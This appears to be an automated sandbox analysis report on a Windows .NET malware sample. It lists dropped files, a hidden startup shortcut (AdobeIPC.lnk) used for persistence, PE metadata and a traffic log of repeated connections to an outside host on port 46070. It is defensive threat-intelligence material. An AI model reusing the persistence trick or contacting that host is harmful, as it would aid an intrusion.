Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwfw5dkb.v3d.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgt1coh3.510.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzsuz335.ltx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqn1ceza.owy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wziq02vf.kdq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrxerhss.qec.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AdobeIPC.lnk

Download File

Process:	C:\ProgramData\AdobeIPC.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:07:58 2024, mtime=Sun Oct 13 16:07:58 2024, atime=Sun Oct 13 16:07:58 2024, length=67072, window=hide
Category:	dropped
Size (bytes):	646
Entropy (8bit):	4.574085184888614
Encrypted:	false
SSDEEP:	12:8PR4XR4VPEc4Y4v2e9qKJ8i4ijAFZx/zbLfhNrDrZBmV:8Z0qKyi4eANvLfh5nZBm
MD5:	39AD676A543337C3B2330D252E98D33E
SHA1:	53535E69774E227E05D04A6C2550521528FA2D7B
SHA-256:	EC2B7C91E8CC8458401395CA82475C37BE63350C15860730D5DB3DCA1AE68FEA
SHA-512:	4D29F28086D4683A2258C94E4F1B5BA0EF44D24F69F995D58E2C5CED27A4F3A91248C854A868C2DED45EF4E98ED326B6EE51CF2696618B72E9B6E6D6C86B218F
Malicious:	false
Preview:	L..................F.... ..s..s....s..s....s..s.................................P.O. .:i.....+00.../C:\...................`.1.....MY.. PROGRA~3..H......O.IMY.....g.........................P.r.o.g.r.a.m.D.a.t.a.....Z.2.....MY.. AdobeIPC..B......MY..MY................................A.d.o.b.e.I.P.C.......F...............-.......E...................C:\ProgramData\AdobeIPC../.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.A.d.o.b.e.I.P.C.`.......X.......878411...........hT..CrF.f4... .m8......,.......hT..CrF.f4... .m8......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.967231060677224
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	jcMcDQ11pZ.exe
File size:	2'523'648 bytes
MD5:	d68dba883125d1a3408e13b84a3524e1
SHA1:	b613717517240829d8c28242a3b2ec7c6576b3f3
SHA256:	cc92146cb6e5e514c4bae54ced9f4bf6724b6b8b370f2f6d219aa5b0f95390ba
SHA512:	bad82130be599397e7a58a80d8301618fd35787c8d7bf5c1ae0d2cd00f92613265cabd9678c7dcd3e4fe8251a2636b14bdc7d0c0f29e383ae54b5dcf08b30de3
SSDEEP:	49152:vMkygnW2WnCzXzf7UPrn2Xb0ThRyUB1CP/yOuUaL4EgfGs3:t7nW2eCzjf7EnNvyCCZeLOG4
TLSH:	E2C5685400149D25FDDD677E226A826BE5ED6E18A7E42C42B80FE9CC22D3E3D4EE7710
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P5.f.................x&...........&.. ....&...@.. ........................&...........@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x6696ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x669A3550 [Fri Jul 19 09:43:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2696a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26a000	0x4ce	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x26c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2676f4	0x267800	e5139bfe8bd387de1c46cd42bb2f5ddd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x26a000	0x4ce	0x600	ef70c1256ca2ae43b082c7da75f95409	False	0.3736979166666667	data	3.7259939203329515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x26c000	0xc	0x200	ff12d740daa9297a2ae87c0e2b75fc35	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x26a0a0	0x244	data			0.4706896551724138
RT_MANIFEST	0x26a2e4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 19:07:59.438333988 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:07:59.438380957 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:07:59.438555956 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:07:59.444865942 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:07:59.444888115 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:07:59.940547943 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:07:59.940608025 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:07:59.942137957 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:07:59.942142963 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:07:59.942477942 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:07:59.980475903 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:08:00.027431011 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:08:00.352660894 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:08:00.352963924 CEST	443	49768	172.67.19.24	192.168.2.4
Oct 13, 2024 19:08:00.353069067 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:08:00.360275030 CEST	49768	443	192.168.2.4	172.67.19.24
Oct 13, 2024 19:08:00.487726927 CEST	49774	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:00.492630959 CEST	46070	49774	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:00.492738962 CEST	49774	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:00.679286003 CEST	49774	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:00.684186935 CEST	46070	49774	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:02.180030107 CEST	46070	49774	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:02.180110931 CEST	49774	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:05.248475075 CEST	49774	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:05.250821114 CEST	49803	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:05.253381014 CEST	46070	49774	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:05.255748034 CEST	46070	49803	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:05.255829096 CEST	49803	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:05.274288893 CEST	49803	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:05.279177904 CEST	46070	49803	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:06.902416945 CEST	46070	49803	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:06.903960943 CEST	49803	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:10.052531958 CEST	49803	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:10.057557106 CEST	46070	49803	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:10.061297894 CEST	49834	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:10.066451073 CEST	46070	49834	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:10.066534042 CEST	49834	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:10.141041994 CEST	49834	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:10.146049976 CEST	46070	49834	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:11.706018925 CEST	46070	49834	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:11.706120968 CEST	49834	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:13.623617887 CEST	49834	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:13.624845982 CEST	49855	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:13.628715038 CEST	46070	49834	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:13.629784107 CEST	46070	49855	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:13.629971981 CEST	49855	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:13.648122072 CEST	49855	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:13.653938055 CEST	46070	49855	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:15.318213940 CEST	46070	49855	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:15.318340063 CEST	49855	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:17.780092001 CEST	49855	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:17.783448935 CEST	49881	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:17.785021067 CEST	46070	49855	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:17.788564920 CEST	46070	49881	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:17.788677931 CEST	49881	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:17.803190947 CEST	49881	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:17.808216095 CEST	46070	49881	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:19.440856934 CEST	46070	49881	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:19.441106081 CEST	49881	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:21.313247919 CEST	49881	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:21.313318014 CEST	49904	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:21.318137884 CEST	46070	49881	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:21.318257093 CEST	46070	49904	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:21.318409920 CEST	49904	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:21.339420080 CEST	49904	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:21.344510078 CEST	46070	49904	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:22.973618984 CEST	46070	49904	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:22.973695040 CEST	49904	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:25.857640028 CEST	49904	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:25.858599901 CEST	49932	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:25.862577915 CEST	46070	49904	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:25.863492012 CEST	46070	49932	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:25.863570929 CEST	49932	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:25.876816988 CEST	49932	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:25.881866932 CEST	46070	49932	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:27.520471096 CEST	46070	49932	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:27.520555973 CEST	49932	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:29.389000893 CEST	49932	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:29.389656067 CEST	49954	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:29.394226074 CEST	46070	49932	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:29.394653082 CEST	46070	49954	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:29.394731045 CEST	49954	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:29.408020020 CEST	49954	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:29.413059950 CEST	46070	49954	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:31.053740978 CEST	46070	49954	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:31.053859949 CEST	49954	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:33.701997042 CEST	49954	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:33.702888966 CEST	49981	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:33.706933975 CEST	46070	49954	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:33.707827091 CEST	46070	49981	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:33.707902908 CEST	49981	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:33.727854013 CEST	49981	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:33.732636929 CEST	46070	49981	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:35.364943981 CEST	46070	49981	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:35.365015984 CEST	49981	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:36.982733965 CEST	49981	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:36.983804941 CEST	50002	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:37.120044947 CEST	46070	49981	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:37.120064020 CEST	46070	50002	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:37.120146036 CEST	50002	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:37.139168978 CEST	50002	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:37.144079924 CEST	46070	50002	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:38.769500971 CEST	46070	50002	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:38.769637108 CEST	50002	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:40.154483080 CEST	50002	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:40.155328989 CEST	50018	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:40.159709930 CEST	46070	50002	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:40.160232067 CEST	46070	50018	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:40.160305023 CEST	50018	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:40.174942017 CEST	50018	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:40.179867029 CEST	46070	50018	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:41.815546989 CEST	46070	50018	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:41.815608978 CEST	50018	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:42.935754061 CEST	50018	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:42.937453985 CEST	50019	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:42.940670013 CEST	46070	50018	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:42.942408085 CEST	46070	50019	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:42.942734957 CEST	50019	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:42.958791971 CEST	50019	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:42.963617086 CEST	46070	50019	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:44.666340113 CEST	46070	50019	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:44.666502953 CEST	50019	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:45.014911890 CEST	50020	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:45.014925003 CEST	50019	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:45.019958973 CEST	46070	50020	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:45.020160913 CEST	46070	50019	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:45.020328999 CEST	50020	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:45.035516977 CEST	50020	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:45.040410042 CEST	46070	50020	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:46.678253889 CEST	46070	50020	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:46.678339005 CEST	50020	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:47.763938904 CEST	50020	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:47.764700890 CEST	50021	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:47.768970013 CEST	46070	50020	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:47.769658089 CEST	46070	50021	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:47.769800901 CEST	50021	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:47.784312963 CEST	50021	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:47.789410114 CEST	46070	50021	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:49.428287983 CEST	46070	50021	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:49.428392887 CEST	50021	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:49.810750008 CEST	50021	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:49.812874079 CEST	50022	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:49.816243887 CEST	46070	50021	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:49.817738056 CEST	46070	50022	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:49.817850113 CEST	50022	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:49.838854074 CEST	50022	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:49.843796968 CEST	46070	50022	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:51.489697933 CEST	46070	50022	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:51.489787102 CEST	50022	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:51.873262882 CEST	50022	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:51.875407934 CEST	50023	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:51.878248930 CEST	46070	50022	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:51.880304098 CEST	46070	50023	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:51.880367994 CEST	50023	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:51.895617008 CEST	50023	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:51.900479078 CEST	46070	50023	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:53.536734104 CEST	46070	50023	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:53.537214994 CEST	50023	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:54.013732910 CEST	50023	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:54.014540911 CEST	50024	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:54.018623114 CEST	46070	50023	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:54.019399881 CEST	46070	50024	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:54.019464970 CEST	50024	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:54.034497023 CEST	50024	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:54.039359093 CEST	46070	50024	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:55.678729057 CEST	46070	50024	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:55.678791046 CEST	50024	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:55.763771057 CEST	50024	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:55.765496969 CEST	50025	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:55.768527985 CEST	46070	50024	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:55.770355940 CEST	46070	50025	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:55.770457983 CEST	50025	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:55.794030905 CEST	50025	46070	192.168.2.4	193.161.193.99
Oct 13, 2024 19:08:55.809425116 CEST	46070	50025	193.161.193.99	192.168.2.4
Oct 13, 2024 19:08:57.428684950 CEST	46070	50025	193.161.193.99	192.168.2.4
